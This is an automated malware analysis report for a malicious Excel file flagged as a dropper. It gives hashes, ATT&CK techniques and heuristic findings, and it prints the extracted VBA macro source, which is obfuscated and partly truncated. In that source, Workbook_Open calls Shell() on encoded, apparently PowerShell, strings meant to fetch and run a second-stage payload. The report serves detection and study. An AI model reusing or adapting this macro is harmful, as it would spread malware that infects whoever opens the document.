Office (OLE) malware analysis — malicious · 9dc6974b2e288fbe

MALICIOUS

Office (OLE)

67.0 KB Created: 2019-04-09 11:33:01 Authoring application: Microsoft Excel First seen: 2021-06-13

MD5: 123ef5bc8d73a0e5747b4bb60c31d266 SHA-1: 5a15ff6fc9c7eea4df7388873a40c9f436a9c0ab SHA-256: 9dc6974b2e288fbeff404c6883cd1cf9ab4418b9f2bf43887f0ca5915d791a3d

220 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The critical heuristic 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' indicate that the Workbook_Open macro executes a Shell command. The VBA code appears to be obfuscated, but the Shell() call is evident and likely used to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6936503-0' further supports its malicious nature as a dropper.

Heuristics 5

ClamAV: Doc.Dropper.Agent-6936503-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6936503-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9533 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9533 bytes
SHA-256: `b1e9a4efe04eebe1ecde4813d65601ae740e488168db0b099266d6813016c545`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Function Terrra() Terrra = "oYEK""""tRequG""U$""ceNn""$""""E$gtvc$g""""$""QrgYutgjNN""""G/gZ""e[dCruu""""y/3""""""P/RqQTkHGn""""p/PQpkGvct""""""""Z&""8?""""""]jETC6_+6V0UqTVPkI""+""=^$b$[&ks""""""?]""jetc""]__^$""$-""""""]JEtC5_+6V0UQTvpK" End Function Function udsjd893298jdsdfgghfd43() As String udsjd893298jdsdfgghfd43 = "ujbr""&($""$^""""""-""E]CJ_t650+QVvUKTip+""-^$=$C]Tt[C<_t<xgTggu""""uN""x)TccKnD-)G)-)<)s{)k""++""x0NcGW=+/""qlpk""N""""u)cxKTDc)n)-)G)-{<ks+)""""0+cxWN~G(""""b""X&tGQDgUtrHGTGpggEv0uQtvpKi]+&3Z} 8_5)-)zL/KQ)p+)^$~$""0""U&gJNnfK3]-_U&GjNnFk3]_5)-)z$+" udsjd893298jdsdfgghfd43 = N_N8922(udsjd893298jdsdfgghfd43) End Function Sub gorillaglasses() remma = "humdinger" vega = N_N8922("Oe""f""""""""""""e1""") Debug.Print: printetHP = Shell#(vega + N_N8922(Terrra) & sponsorces & udsjd893298jdsdfgghfd43, xlTimeScale - 3) End Sub Sub Workbook_Open() Dim vibro As Integer demotest = xlDate vibro = Application.International(demotest) If vibro = (100 - 19) Then gorillaglasses Debug.Print End Sub Function constantt() constantt = "g()> ""\""))93]RAhc[]Gnirts[${X6})58]RAhc[>89]RAhc[>601]RAhc[((EcALpEr.)'`$'${X6}'QnO'(EcALpEr.)') )63]RaHc[${X6}Ubj'>'rbUUbj eCAlPeRC- 421]RaHc[${X6})221]RaHc[>4'>'5]RaHc[>96]RaHc[( ECaLpER- 69]RaHc['>'${X6}Ubjyr5Ubj e'>'CAlPeRC- 29]RaHc[${X6})'>'211]RaHc[>09]RaHc[>55]RaHc[( ECaLpER-93]RaHc[${X6})35]RaHc[>55]RaHc[>08]RaHc[( ECaLpER- 43]RaHc[${X6}Ub'>'jnRBUbjECaLpER-)Ubj)))nRB57PnRB${X6}57P.^57P(ecaUbj>Ubjlper- '>']1[}NNyr5n{rbU(>nRB]57P(nRB>]0[}NNyr5N{rbU()57Pei57P${X6}57Px57P f- nRB}0{}1{nRB(.;nRB]57P(pZ7nRB tilps- Ubj>Ubj))57Ubj>UbjPu5Ubj>Ubj7P${X6}nRB57P>57PunRB(nUbj>UbjRBEcAlpyr5eR'>'nRB.}eUbj>Ubjsyr5c{rbU(=}NNyr5n{rbUbj>UbjU;)}TRyr5Eh{rbU()57Pv57P${X6}Ubj>Ubj57Psev57Pf-nRB}0{}1{nRB(.=}Esyr5c{rbU;}SUyUbj>Ubjr5v{rbU zzyx'>'- }Eyr5E{rbU gaaa- )57Pt57P${X6}57Pset57P f-nRB'>'}0{}1{nRB(& ='>' }TReyr5h'>'{rbU;}}RESyr5UB{rbU nruter;)}aZyr'>'5cb{rbU(nRBgNyr5IRyr5Tyr5stEgnRBUbj>Ubj.nRB8Fyr5tUnRB::]gnidocnE.txUbj>UbjeT.met'>'sUbj>UbjyS[ = }Reyr5sUb{rbU;)}ni4'>'yr5Ubj>Ubj" End Function Function peopleorder() peopleorder = "6t{rbU(nRUbj>UbjBgniyr5Ryr5Ts46yr5eyr5SabmorFnRB::]trevUbj>UbjnoC.metsyS[ = }aZCyr5B{rbU{)}NIyr54yr56t{rbU(SEVyr5V noitcnuF;})(nRBdNyr5Ubj>UbjeOTDUbj>UbjAEyr5RnRB.}REDaERyUbj>Ubjr5Myr5Ayr5EUbj>UbjRTS{rbU;)}eUyr5Rt{rbU ${X6}}iMyr5Ayr5da{'>'rbU('>')57Pred57P${X6}57POUbj>UbjI.mets57'>'P${X6}57PyS57P${X6}57Pm'>'a57P${X6}57PaeR57P${X6}5'>'7PertS.57Pf'>'- n'>'RB}5{}1{}2{}0{}4{}3{nRBUbj>Ubj( )57PmO57P(. = }Redyr5AERyUbj>Ubjr5Myr5AER'>'ts{rbU})nRBSsErpM'>'Ubj>UbjOyr5cy'>'r5Ubj>UbjEdnRB:'>':]edoMnoisserpmoC.noisserpmoC.OI[ ${X6}}iMAyUbj>Ubjr5DA{r'>'Ubj>UbjbU()57PmaertSp57P${X6}57'>'P.me57P${X6}57Pis57P${X6}57PI57P${X6}57Po57P${X6}57Pse57P${X6}57PrpmoCUbj>Ubj.O57P${X6}57PiZG.n57P${X6}57PsyS57P${X6}57Pt57P fUbj>U'>'bj-nUbj>UbjRB}9{}2{}5{}7{}4{}3{}6{}8{}0{}1{nRB( )57PmO57P(. = }ImUbj>UbjAyr5dyr'>'5a{rbU{ )f'>'1x0 qe- ]0[}OUbj>UbjkOJyr5M{rbU( fi;)}esLyr5af{'>'rbU ${X6}}okoyr5Jyr5M{rbU()57Ptsy57P${X6}57Pmaer57P${X6}57PS5Ubj>Ubj7P'>'${X6}57PtSyro57P${X6" End Function Function stepcalculation() stepcalculation = "}57PmeM.OI57P${X6}57P.me57Pf-nRB}4{}2{}1{}0{}5{}3{nRB( )57PmO57P(. = }Ubj>UbjIMAyr5DA{rbU;)25 - nRBHTGneyr5LUbj>UbjnUbj>UbjRB.}ORUyr5TYB{rbU ${X6}25 ${X6}}ORUyr5Tyr5yUbj>UbjB{rbU'>'(nRBkCoLyr5Byr5lAyr5Ubj>UbjnIFMUbj>Ub'>'jroFsNyr5Ar'>'tnRUbj>UbjB.}QAyr5sAyr5q{rbU = }okyr5oyr5JM{rbU;)}Sfeyr5d{rbU ${X6}}d2AUbj>Ubjyr5xUbj>Ubj{rbU(nRBROtpYyr5Ryr5Cyr5Ubj>Ubjedeyr5TA'>'ercnRB.}Seyr5A{rbU = }QAyr5sAyr5Q{rbU;)25 - nRBHTgyr5NeLnRUbj>UbjB.}oRutYyr5B{r'>'bU Ubj>Ubj${X6}25 ${X6}}oUbj>UbjRUyr'>'5tyyr5b{rbU(nRBhSAyr5Hetupyr5mOcnRB.}'>'cAyr5mH{rbU = }ReDyr5EE{rb'>'U;))02(nRBsETyr5Yyr5BTeUbj>UbjgnRB.}0Zyr5xc'>'r{rbU${X6}()57PpyrC57P${X6}57PMH.yhp ... (truncated)

SHA-256: b1e9a4efe04eebe1ecde4813d65601ae740e488168db0b099266d6813016c545

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function Terrra()
Terrra = "oYEK""""tRequG""U$""ceNn""$""""E$gtvc$g""""$""QrgYutgjNN""""G/gZ""e[dCruu""""y/3""""""P/RqQTkHGn""""p/PQpkGvct""""""""Z&""8?""""""]*jETC6_+6V0UqTVPk*I""+""=^$b$[&ks""""""?]""jetc""]__^$""$-""""""]*JEtC5_+6V0UQTvpK"
End Function
Function udsjd893298jdsdfgghfd43() As String
udsjd893298jdsdfgghfd43 = "ujbr""&(*$""$^""""""-*""E]CJ_t650+QVvUKTip+*""-^$=$C]Tt[C<_t<xgTggu""*""*uN*""x)TccKnD-)G)-)<)s{)k""++""x0NcGW=+/""qlpk*""N""""u)*cxKTDc)n)-)G)-{<ks+)""""0+cxWN~G(""*""b""X&tGQDgUtrHGTGpggEv0uQtvpK*i]+&3Z} 8_5)-)zL/KQ)p+)^$~$""0""*U&gJNnfK3]-_U&GjNnFk3]_5)-)z$+"
udsjd893298jdsdfgghfd43 = N_N8922(udsjd893298jdsdfgghfd43)
End Function


Sub gorillaglasses()
remma = "humdinger"
vega = N_N8922("Oe""f""""""""""""e1""")

Debug.Print: printetHP = Shell#(vega + N_N8922(Terrra) & sponsorces & udsjd893298jdsdfgghfd43, xlTimeScale - 3)

End Sub
Sub Workbook_Open()
Dim vibro As Integer
demotest = xlDate
vibro = Application.International(demotest)
If vibro = (100 - 19) Then gorillaglasses
Debug.Print
End Sub



Function constantt()
constantt = "g()> ""\""))93]RAhc[]Gnirts[${X6})58]RAhc[>89]RAhc[>601]RAhc[((EcALpEr.)'`$'${X6}'QnO'(EcALpEr.)') )63]RaHc[${X6}Ubj'>'rbUUbj  eCAlPeRC- 421]RaHc[${X6})221]RaHc[>4'>'5]RaHc[>96]RaHc[( ECaLpER- 69]RaHc['>'${X6}Ubjyr5Ubj e'>'CAlPeRC- 29]RaHc[${X6})'>'211]RaHc[>09]RaHc[>55]RaHc[(  ECaLpER-93]RaHc[${X6})35]RaHc[>55]RaHc[>08]RaHc[( ECaLpER-  43]RaHc[${X6}Ub'>'jnRBUbjECaLpER-)Ubj)))nRB57PnRB${X6}57P.^57P(ecaUbj>Ubjlper- '>']1[}NNyr5n{rbU(>nRB]57P(nRB>]0[}NNyr5N{rbU()57Pei57P${X6}57Px57P f- nRB}0{}1{nRB(.;nRB]57P(pZ7nRB tilps- Ubj>Ubj))57Ubj>UbjPu5Ubj>Ubj7P${X6}nRB57P>57PunRB(nUbj>UbjRBEcAlpyr5eR'>'nRB.}eUbj>Ubjsyr5c{rbU(=}NNyr5n{rbUbj>UbjU;)}TRyr5Eh{rbU()57Pv57P${X6}Ubj>Ubj57Psev57Pf-nRB}0{}1{nRB(.=}Esyr5c{rbU;}SUyUbj>Ubjr5v{rbU zzyx'>'- }Eyr5E{rbU gaaa- )57Pt57P${X6}57Pset57P f-nRB'>'}0{}1{nRB(& ='>' }TReyr5h'>'{rbU;}}RESyr5UB{rbU nruter;)}aZyr'>'5cb{rbU(nRBgNyr5IRyr5Tyr5stEgnRBUbj>Ubj.nRB8Fyr5tUnRB::]gnidocnE.txUbj>UbjeT.met'>'sUbj>UbjyS[ = }Reyr5sUb{rbU;)}ni4'>'yr5Ubj>Ubj"
End Function
Function peopleorder()
peopleorder = "6t{rbU(nRUbj>UbjBgniyr5Ryr5Ts46yr5eyr5SabmorFnRB::]trevUbj>UbjnoC.metsyS[ =  }aZCyr5B{rbU{)}NIyr54yr56t{rbU(SEVyr5V noitcnuF;})(nRBdNyr5Ubj>UbjeOTDUbj>UbjAEyr5RnRB.}REDaERyUbj>Ubjr5Myr5Ayr5EUbj>UbjRTS{rbU;)}eUyr5Rt{rbU ${X6}}iMyr5Ayr5da{'>'rbU('>')57Pred57P${X6}57POUbj>UbjI.mets57'>'P${X6}57PyS57P${X6}57Pm'>'a57P${X6}57PaeR57P${X6}5'>'7PertS.57Pf'>'- n'>'RB}5{}1{}2{}0{}4{}3{nRBUbj>Ubj( )57PmO57P(. = }Redyr5AERyUbj>Ubjr5Myr5AER'>'ts{rbU})nRBSsErpM'>'Ubj>UbjOyr5cy'>'r5Ubj>UbjEdnRB:'>':]edoMnoisserpmoC.noisserpmoC.OI[ ${X6}}iMAyUbj>Ubjr5DA{r'>'Ubj>UbjbU()57PmaertSp57P${X6}57'>'P.me57P${X6}57Pis57P${X6}57PI57P${X6}57Po57P${X6}57Pse57P${X6}57PrpmoCUbj>Ubj.O57P${X6}57PiZG.n57P${X6}57PsyS57P${X6}57Pt57P fUbj>U'>'bj-nUbj>UbjRB}9{}2{}5{}7{}4{}3{}6{}8{}0{}1{nRB( )57PmO57P(. = }ImUbj>UbjAyr5dyr'>'5a{rbU{ )f'>'1x0 qe- ]0[}OUbj>UbjkOJyr5M{rbU( fi;)}esLyr5af{'>'rbU ${X6}}okoyr5Jyr5M{rbU()57Ptsy57P${X6}57Pmaer57P${X6}57PS5Ubj>Ubj7P'>'${X6}57PtSyro57P${X6"
End Function
Function stepcalculation()
stepcalculation = "}57PmeM.OI57P${X6}57P.me57Pf-nRB}4{}2{}1{}0{}5{}3{nRB( )57PmO57P(. = }Ubj>UbjIMAyr5DA{rbU;)25 - nRBHTGneyr5LUbj>UbjnUbj>UbjRB.}ORUyr5TYB{rbU ${X6}25 ${X6}}ORUyr5Tyr5yUbj>UbjB{rbU'>'(nRBkCoLyr5Byr5lAyr5Ubj>UbjnIFMUbj>Ub'>'jroFsNyr5Ar'>'tnRUbj>UbjB.}QAyr5sAyr5q{rbU = }okyr5oyr5JM{rbU;)}Sfeyr5d{rbU ${X6}}d2AUbj>Ubjyr5xUbj>Ubj{rbU(nRBROtpYyr5Ryr5Cyr5Ubj>Ubjedeyr5TA'>'ercnRB.}Seyr5A{rbU = }QAyr5sAyr5Q{rbU;)25 - nRBHTgyr5NeLnRUbj>UbjB.}oRutYyr5B{r'>'bU Ubj>Ubj${X6}25 ${X6}}oUbj>UbjRUyr'>'5tyyr5b{rbU(nRBhSAyr5Hetupyr5mOcnRB.}'>'cAyr5mH{rbU = }ReDyr5EE{rb'>'U;))02(nRBsETyr5Yyr5BTeUbj>UbjgnRB.}0Zyr5xc'>'r{rbU${X6}()57PpyrC57P${X6}57PMH.yhp
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.